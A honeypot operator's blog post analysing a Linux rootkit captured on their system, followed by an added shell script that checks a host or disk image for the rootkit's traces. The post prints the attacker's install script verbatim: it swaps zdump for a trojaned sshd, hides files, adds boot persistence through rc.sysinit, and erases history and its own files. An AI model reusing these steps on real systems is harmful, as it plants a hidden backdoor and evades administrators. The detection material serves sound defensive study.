Linux Rootkit "bum.pdf" dropped onto my Honeypot Today

A malicious user from Romania, connecting with PuTTY, dropped off a Linux rootkit on my honeypot today.

From my initial analysis it appears that the rootkit installs a hidden SSH server listening on port 10001. The install script below swaps /usr/sbin/zdump for a trojaned sshd, pins it with chattr so it cannot be removed or overwritten, unpacks an archive into the hidden directory /usr/include/X11/.swap/, and appends a launcher (/usr/include/sound/sounds.h) to /etc/rc.sysinit so the backdoor restarts at boot.

I haven't had much time to look through the entire package but if you'd like to browse what was dropped off I have uploaded everything to CaffSec-Malware-Analysis.

If you find anything interesting, please feel free to post a comment.

UPDATE: I have found a related article talking about a backdoor installed on port 10001.  Read the article here:

Here is the install script for the main payload.  Interesting stuff!

unset history
mv /lib/
chattr -suia /usr/sbin/zdump
rm -rf /usr/sbin/zdump
mv sshd /usr/sbin/zdump
chattr +suia /usr/sbin/zdump
mkdir -p /usr/include/X11/.swap/
tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ >>/dev/null
mkdir -p /usr/include/sound
mv /usr/include/sound/
mv sounds.h /usr/include/sound/
chmod 770 /usr/include/sound/sounds.h
echo "# Now that we have all of our basic modules loaded and the kernel going,">>/etc/rc.sysinit
echo "# let's dump the syslog ring somewhere so we can find it later" >>/etc/rc.sysinit
echo "/usr/include/sound/sounds.h" >>/etc/rc.sysinit
sleep 10
echo "Enjoy your new box on port 10001"
cd ..
rm -rf rks*
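The install script above leaves a handful of filesystem artifacts that are easy to check for on any box the same attacker may have touched. The following triage script is an added example written for this post, not something that was in the dropped package: it looks for the hidden .swap directory, an executable "sounds.h", the launcher line appended to rc.sysinit, OpenSSH strings inside /usr/sbin/zdump (the real zdump is a timezone dumper and has none), the chattr immutable/append-only bits, and, on a live host, a listener on port 10001. The build_demo_tree function constructs a fake post-install tree so the checks can be exercised offline; the "OpenSSH_4.3" marker in it is invented for the demo.

```shell
#!/bin/sh
# Added triage script (not part of the original post or the dropped rootkit).
# Checks a filesystem root for the artifacts the install script leaves behind.
# The root may be "/" on a live host, or a mounted image / test directory.

check_rootkit_iocs() {
    root="${1:-/}"
    hits=0

    # 1. Hidden staging directory that pic.tar.gz is unpacked into.
    if [ -d "$root/usr/include/X11/.swap" ]; then
        echo "HIT: hidden directory $root/usr/include/X11/.swap" >&2
        hits=$((hits + 1))
    fi

    # 2. "sounds.h" was chmod 770: a genuine header is never executable.
    f="$root/usr/include/sound/sounds.h"
    if [ -f "$f" ] && [ -x "$f" ]; then
        echo "HIT: executable header $f" >&2
        hits=$((hits + 1))
    fi

    # 3. Launcher appended to rc.sysinit behind a fake syslog comment.
    if grep -q '^/usr/include/sound/sounds.h' "$root/etc/rc.sysinit" 2>/dev/null; then
        echo "HIT: rc.sysinit runs /usr/include/sound/sounds.h at boot" >&2
        hits=$((hits + 1))
    fi

    # 4. zdump replaced by sshd: the real zdump carries no OpenSSH strings.
    z="$root/usr/sbin/zdump"
    if [ -f "$z" ] && grep -qa 'OpenSSH' "$z" 2>/dev/null; then
        echo "HIT: $z contains OpenSSH strings (trojaned sshd)" >&2
        hits=$((hits + 1))
    fi
    # Immutable / append-only bits left by 'chattr +suia'; lsattr may be absent.
    if [ -f "$z" ] && command -v lsattr >/dev/null 2>&1; then
        if lsattr "$z" 2>/dev/null | cut -d' ' -f1 | grep -q '[ia]'; then
            echo "HIT: $z has immutable/append-only attributes" >&2
            hits=$((hits + 1))
        fi
    fi

    # 5. Only meaningful on a live host: the hidden sshd listening on 10001.
    if [ "$root" = "/" ] && command -v ss >/dev/null 2>&1; then
        if ss -ltn 2>/dev/null | grep -q ':10001 '; then
            echo "HIT: TCP listener on port 10001" >&2
            hits=$((hits + 1))
        fi
    fi

    # Human-readable findings went to stderr; the hit count is the result.
    echo "$hits"
}

# Constructed sample tree (not a real capture) mimicking the post-install
# state of the script above, so the checks can be run without a victim box.
build_demo_tree() {
    root="$1"
    mkdir -p "$root/usr/include/X11/.swap" "$root/usr/include/sound" \
             "$root/usr/sbin" "$root/etc"
    printf '#!/bin/sh\n# stand-in for the launcher the rootkit drops\n' \
        > "$root/usr/include/sound/sounds.h"
    chmod 770 "$root/usr/include/sound/sounds.h"
    printf '%s\n%s\n%s\n' \
        '# Now that we have all of our basic modules loaded and the kernel going,' \
        "# let's dump the syslog ring somewhere so we can find it later" \
        '/usr/include/sound/sounds.h' >> "$root/etc/rc.sysinit"
    # Invented marker string standing in for an sshd binary's version banner.
    printf 'fake binary carrying an OpenSSH_4.3 banner\n' > "$root/usr/sbin/zdump"
}

# Usage: sh triage.sh /            (live host)
#        sh triage.sh /mnt/image   (mounted disk image)
if [ "$#" -gt 0 ]; then
    n=$(check_rootkit_iocs "$1")
    echo "indicators found: $n"
fi
```

On a clean system every check should come back empty; on a box hit by this kit the demo tree reproduces four of the six indicators (the chattr bits and the live listener only show up on the real thing). The zdump string check is deliberately crude: a re-packed or stripped sshd could dodge it, so treat the rc.sysinit launcher and the hidden directory as the more reliable signals.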
